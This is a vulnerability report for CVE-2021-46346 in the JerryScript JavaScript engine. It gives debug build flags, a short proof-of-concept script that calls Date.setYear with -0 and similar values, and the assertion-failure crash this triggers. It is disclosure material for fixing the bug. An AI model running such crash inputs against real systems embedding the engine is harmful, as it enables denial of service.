CVE-2021-46346: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set)

JerryScript revision

Commit: a6ab5e9

Version: v3.0.0

Build platform

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test casepoc.js

var date;

date = new Date(1970, 0);
date.setYear((date.getFullYear(), 1900, 'y = -0'));
date.setYear(-0);

date.setYear(-0);
date.setYear(-0);
assert.sameValue(date.getFullYear(), 1900, 'y = -0');

date = new Date(1970, 0);
date.setYear(0);
assert.sameValue(date.getFullYear(), 1900, 'y = 0');

date = new Date(1970, 0);
date.setYear(50);
assert.sameValue(date.getFullYear(), 1950, 'y = 50');

date = new Date(1970, 0);
date.setYear(50.999999);
assert.sameValue(date.getFullYear(), 1950, 'y = 50.999999');

date = new Date(1970, 0);
date.setYear(99);
assert.sameValue(date.getFullYear(), 1999, 'y = 99');

date = new Date(1970, 0);
date.setYear(99.999999);
assert.sameValue(date.getFullYear(), 1999, 'y = 99.999999');

​Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 309 abort jerry poc.js

Credits: Found by OWL337 team.